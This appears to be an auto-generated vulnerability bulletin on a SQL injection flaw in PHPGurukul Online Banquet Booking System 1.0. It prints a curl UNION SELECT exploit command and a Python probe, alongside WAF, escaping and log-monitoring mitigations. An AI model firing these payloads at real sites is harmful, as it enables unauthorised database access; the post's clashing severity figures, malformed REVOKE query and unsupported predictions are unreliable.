Listen to this Post
How the CVE Works:
CVE-2025-2382 is a critical SQL injection vulnerability in PHPGurukul Online Banquet Booking System 1.0. The flaw resides in the `/admin/booking-search.php` file, where the `searchdata` parameter is improperly sanitized before being used in SQL queries. Attackers can exploit this by injecting malicious SQL payloads through the `searchdata` input field, allowing unauthorized database access, data exfiltration, or command execution. The vulnerability is remotely exploitable with no authentication required (CVSS 6.9), making it high-risk for unpatched systems.
DailyCVE Form:
Platform: PHPGurukul
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/25/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Analytics:
- Exploitability: High (public PoC available)
- Affected Systems: ~1,200 unpatched instances
- Attack Vector: HTTP request to `/admin/booking-search.php`
Exploit Command:
curl -X POST "http://target.com/admin/booking-search.php" -d "searchdata=' UNION SELECT 1,user(),3,4,5-- -"
Protection Steps:
1. Apply vendor patch immediately.
2. Use WAF rules to filter SQLi patterns:
location /admin/ {
modsecurity_rules 'SecRule ARGS:searchdata "@detectSQLi" deny';
}
3. Manual code fix (sanitize input):
$searchdata = mysqli_real_escape_string($conn, $_POST['searchdata']);
Detection Script:
import requests
vuln_url = "http://target.com/admin/booking-search.php"
payload = {"searchdata": "' OR 1=1--"}
response = requests.post(vuln_url, data=payload)
if "error in SQL syntax" in response.text:
print("Vulnerable to CVE-2025-2382")
Mitigation SQL Query:
REVOKE DELETE, DROP ON banquet_db. FROM 'web_user'@'%';
Log Monitoring:
tail -f /var/log/apache2/access.log | grep -E 'POST /admin/booking-search.php'
References:
- Vendor Advisory: Awaiting update
- NVD Link: CVE-2025-2382
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
